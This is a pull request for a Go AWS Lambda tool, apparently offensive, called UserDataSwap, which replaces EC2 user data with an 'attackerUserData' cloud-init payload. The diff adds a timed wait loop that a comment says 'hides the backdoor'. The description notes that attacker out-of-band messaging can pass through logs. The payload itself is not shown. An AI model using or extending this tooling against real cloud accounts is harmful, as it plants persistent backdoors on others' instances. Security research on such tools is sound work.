### PR TITLE
Wait statements inserted with DEBUG Commands

### DIFF
--- a/UserDataSwap/main.go
+++ b/UserDataSwap/main.go
@@ -41,7 +41,7 @@ func handleRequest(ctx context.Context, event events.CloudWatchEvent) {
          * 2 minutes may be enough to get most instances going, also hides the backdoor
 	 */
 	
-	for i := 1; i < 5; i++ {
+        for i := 1; i < 5; i++ {
             time.Sleep(60 * time.Second)
             fmt.Printf("DEBUG: Sleeping for 60 seconds, Round %d\n", i)
         }

--- a/UserDataSwap/main.go
+++ b/UserDataSwap/main.go
@@ -4,6 +4,7 @@ import (
 	"context"
 	"encoding/json"
 	"fmt"
+	"time"
 	"github.com/aws/aws-lambda-go/events"
 	"github.com/aws/aws-lambda-go/lambda"
 	"github.com/aws/aws-sdk-go-v2/config"
@@ -34,11 +35,26 @@ func handleRequest(ctx context.Context, event events.CloudWatchEvent) {
 
 	// TODO: work with multiple instances in same request
 	instance := runEvent.ResponseElements.InstancesSet.Items[0]
+	
+	/* If using things like Terraform you'll have difficult time with automation tools.
+         * We have to keep the Lambda running, writting to a log file is ideal.
+         * 2 minutes may be enough to get most instances going, also hides the backdoor
+	 */
+	
+	for i := 1; i < 5; i++ {
+            time.Sleep(60 * time.Second)
+		fmt.Printf("DEBUG: Sleeping for 60 seconds, Round %d\n", i)
+        }
+	
 	fmt.Printf("Instance = %v\n", instance)
 
 	originalUserData := GetUserData(ctx, &instance.InstanceId)
 	fmt.Printf("[DEBUG] Original user data is: %s\n", originalUserData.Value)
 
+	/* TODO: Make the attackerUserData read a file called bootcmd.txt. The file contents
+	 * should contain a line by line bootcmd in YAML format.
+	 */ 
+	
 	attackerUserData := `#cloud-config
 
 bootcmd:

--- a/UserDataSwap/main.go
+++ b/UserDataSwap/main.go
@@ -41,10 +41,10 @@ func handleRequest(ctx context.Context, event events.CloudWatchEvent) {
          * 2 minutes may be enough to get most instances going, also hides the backdoor
 	 */
 	
-        for i := 1; i < 5; i++ {
-            time.Sleep(60 * time.Second)
-            fmt.Printf("DEBUG: Sleeping for 60 seconds, Round %d\n", i)
-        }
+	for i := 1; i < 5; i++ {
+		time.Sleep(60 * time.Second)
+		fmt.Printf("DEBUG: Sleeping for 60 seconds, Round %d\n", i)
+	}
 	
 	fmt.Printf("Instance = %v\n", instance)
 

--- a/UserDataSwap/main.go
+++ b/UserDataSwap/main.go
@@ -43,7 +43,7 @@ func handleRequest(ctx context.Context, event events.CloudWatchEvent) {
 	
 	for i := 1; i < 5; i++ {
             time.Sleep(60 * time.Second)
-		fmt.Printf("DEBUG: Sleeping for 60 seconds, Round %d\n", i)
+            fmt.Printf("DEBUG: Sleeping for 60 seconds, Round %d\n", i)
         }
 	
 	fmt.Printf("Instance = %v\n", instance)


### PR DESCRIPTION
Currently the wait statement waits a total of 5 minutes writing a DEBUG statement out to CloudWatch. It should be noted that it can also be delivered potentially to a 3rd party's logger which may help the attacker retain some type of out of band messaging. The wait statement has been helpful in stopping / starting the UserDataSwap with automatic build tools.

Currently has not been fully tested with Autoscaling groups.